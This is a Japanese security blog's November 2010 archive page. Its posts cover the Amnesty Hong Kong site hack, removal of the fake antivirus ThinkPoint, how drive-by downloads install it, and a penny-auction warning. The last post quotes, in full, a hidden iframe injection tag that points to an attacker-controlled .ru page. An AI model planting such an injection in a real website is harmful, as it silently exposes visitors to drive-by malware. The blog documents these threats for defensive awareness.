月別アーカイブ: 11月 2010

アムネスティ香港のサイトがハッキングされウイルス散布 – IEゼロデイ攻撃も


 アムネスティ・インターナショナルの香港版公式サイト(amnesty.org.hk)がハッキングされウイルスを散布したそうな。現在は対処済み。
AIHK affected by cyber attack (Amnesty International Hong Kong)
Amnesty International Hong Kong Website Injected With Latest Internet Explorer 0-day (Websense Security Labs)

 んで、セキュリティ企業Websenseの報告だと、トップページに1×1サイズの見えないインラインフレーム(IFRAME)が挿入されていて、外部の攻撃ページが裏で強制的に読み込まされる形。攻撃ページには、「Adobe Reader」「Apple QuickTime」「Adobe Shockwave Player」の脆弱性を悪用してウイルスを強制的に発動させようとしてるん。ただ、この脆弱性は、すべて最新バージョンで解消済み。つっても、すべて今年に問題が発覚して対処された新しいものばかり。直近のものは「Adobe Shockwave Player」で先々週に修正! ( ~_~)/

 これらのソフトウェアが導入されていて、かつ最新バージョンにちゃんと更新してなかった場合に感染しちゃうウイルスのセキュリティソフト対応状況として、ファイル単体のオンラインスキャンVirusTotalの結果が公開されてますな。

  • Adobe Reader の脆弱性悪用 → 2/43 状態なウイルス発動
  • Apple QuickTime の脆弱性悪用 → 16/43 状態なウイルス発動
  • Adobe Shockwave Player の脆弱性悪用 → 0/43 状態なウイルス発動

 当たり前ですが、報告時点で検知できないセキュリティソフトが大量に存在してるのが分かりますねぇ。1日に数万種のウイルスが投入され、もう定義データでの対応がまったく追いついてないので毎日がこんな状態なわけですが、『セキュリティソフトを導入してWindows Updateしとけば、すべて完ぺき!』などと思い込んでる人がやられてしまうん。(*_*)

ドライブバイ・ダウンロード対策(無料)

広告

ThinkPoint(Think Point)の駆除・削除方法 (偽ウイルス対策ソフト)


 偽ウイルス対策ソフト「ThinkPoint」(Think Pointは、マイクロソフトの正規セキュリティソフト「Microsoft Security Essentials」(MSE)のデザインを装ったインチキ偽プログラムを経由して強制的に導入させるため、マイクロソフトは11月4日にサポートページにて『How to remove ThinkPoint from your computer』(あなたのコンピュータからThinkPointを駆除する方法)を公開しとりますな。

 日本語翻訳ページもあるけど、まだ機械翻訳ということで意味がトンチンカンなのでテキトー訳。

● 概要
 パソコンを起動すると、デスクトップのアクセスを妨害するThinkPointのウィンドウが現れます。タスクマネージャを起動することができず、Internet Explorerやその他のプログラムを開くこともできません。この状況はコンピュータがマルウェア(「Win32/FakePAV」の亜種)に感染した結果です。

● 詳細
 ThinkPointを駆除するには、以下のステップを踏んでください。(原文と一部違います)

<Windows XP Professional / Vista / 7 の場合>

  1. パソコンを起動し、出現したThinkPointウィンドウにある「Safe Startup」を選択。
  2. 最大で5分間のスキャン処理が起こるので、終わるまでスキャンさせる。
  3. ThinkPointウィンドウで「Settings」をクリックし、ウィンドウの下にあるチェックボックス「Allow unprotected startup」を選択して、「Save settings」をクリック。
  4. スキャン処理が完了したら、ThinkPointウィンドウを閉じる
  5. Windowsのスタートボタンをクリックして、
    (Windows XP Pro)「ファイル名を指定して実行」の項目をクリック
    (Windows Vista/7)スタートメニューの一番下にある入力ボックス
  6. 小文字で「cmd」という文字を打ち込んでEnterキーを押すと、コマンドプロンプトのウィンドウ(黒い画面)が出現
  7. 小文字で「tasklist」という文字を打ち込んでEnterキーを押す
  8. 一覧から「Hotfix.exe」が存在してることを確認
  9. 「Hotfix.exe」が確認できたら、「taskkill /im hotfix.exe」と打ち込んでEnterキーを押す

<Windows XP Home Edition の場合>

  1. パソコンを起動し、ThinkPointのウィンドウが起動し始めるので、Ctrl+Alt+Delキーでタスクマネージャを起動
  2. [プロセス]タブを選択して、一覧から「Hotfix.exe」の項目を選んで右下の[プロセスの終了]ボタンをクリック
  3. メニューの[ファイル]→[新しいタスクの実行]をクリックして、「explorer.exe」と打ち込んで[OK]ボタン

 ↑ がだめなら、偽ウイルス対策ソフト専用駆除ツール。
Remove Fake Antivirus 1.70


 これでThinkPoint(Think Point)は感染はしてるけど起動はしてない状態になるので、駆除作業に入ります。サポートページでは、無料オンラインスキャン「Windows Live OneCare PC セーフティ」を行うよう促してます。これ以外に、無料ウイルス駆除ツール(英語)の「SUPERAntiSpyware Portable」なり「Malwarebytes’ Anti-Malware」あたりでも。

 ThinkPointの詳細な解析情報やスクリーンショット画像は、Microsoft Malware Protection Center内のコチラ(英語)。自分が開発したソフトウェアを侵害する悪事を行ってる不正プログラムなだけあって気合が入ってますなぁ。


★ 偽セキュリティソフトの駆除ガイドで有名な海外サイト Bleeping Computer の情報
Remove ThinkPoint (Uninstall Guide)エキサイト翻訳 / Google翻訳

偽ウイルス対策ソフトThinkPoint(Think Point)の感染原因 – 駆除したら対策を!


 先月10月あたりから話題になってるようですな。偽ウイルス対策ソフト・偽セキュリティソフトの「ThinkPoint」(Think Point)。起動画面にWindowsのロゴマークがあることから、最初はマイクロソフト製だと勘違いする人もいるみたい。。。
MSE を装う偽セキュリティソフトに注意! (マイクロソフト TechNet Blogs)
画像で見る「Microsoft Security Essentials」を装う偽セキュリティソフト (INTERNET Watch)

 被害に合われた方々のブログ記事をいろいろとチェックすると、十中八九「ThinkPoint」(Think Point)の駆除・削除に苦労したお話と「気を付けて!」という一言アドバイスで終わっちゃってます。これはつまり感染原因を理解してないんですな。

「ThinkPoint」(Think Point)の感染までの流れ
 上のINTERNET Watchのニュース記事にありますが、まず「Microsoft Security Essentials Alert」なるインチキプログラム(英語表記)がパソコンに強制的に導入されるところから始まります。これは名前やアイコン画像など、正規の無料セキュリティソフト「Microsft Security Essentials」(MSE)に似せた不正なプログラムです。

 これがデタラメな偽のウイルス検知画面を出して、駆除できるプログラムとして「ThinkPoint」(Think Point)が導入され、パソコン起動時に立ち上がるようになるんですな。

「Microsoft Security Essentials Alert」が強制的に導入された原因
 ガンブラー(Gumblar)改ざん騒動や、マイクロアド広告改ざんで「Security Tool」爆発感染で被害を受けた人と同じで、『ドライブバイ・ダウンロード対策』をしていなかったため。

 「ThinkPoint」(Think Point)の被害にあったブログ記事で、「○○○というセキュリティソフトを入れてたのにぃ・・・」うんぬんと愚痴ってる方を見かけましたが、そりゃ当たり前です。セキュリティソフトはこの対策をしてくれんのよ。対策をちゃんとしてないパソコンは、攻撃者が用意したありとあらゆるプログラム(ウイルス)を強制的に起動できるので、パソコンの操作権限を奪ったり、パソコン内に保存してある情報を盗み出したりできます。

駆除・削除方法

ペニーオークション比較ネタ 【被害問題 注意喚起 編】


 Swoopo.comというドイツ発祥の「ペニーオークション」(Penny Auction、Bidding Fee Auction)の比較。。。、といっても何かと被害問題となりつつある注意喚起サイトをテキトーにピックアップ! 「オークション」ではなく「ギャンブル」。

Iframe Injection “inglo-kotor.ru/yesproject/check.php”


Hidden Iframe Injection “inglo-kotor. ru”…

<body><iframe width="0" height="0" style="display:none;" id="frmchkldver" src="http://inglo-kotor. ru/yesproject/check. php?ftd=*****&path=%7c*****%7c&sys=UN&wrk=8"></iframe>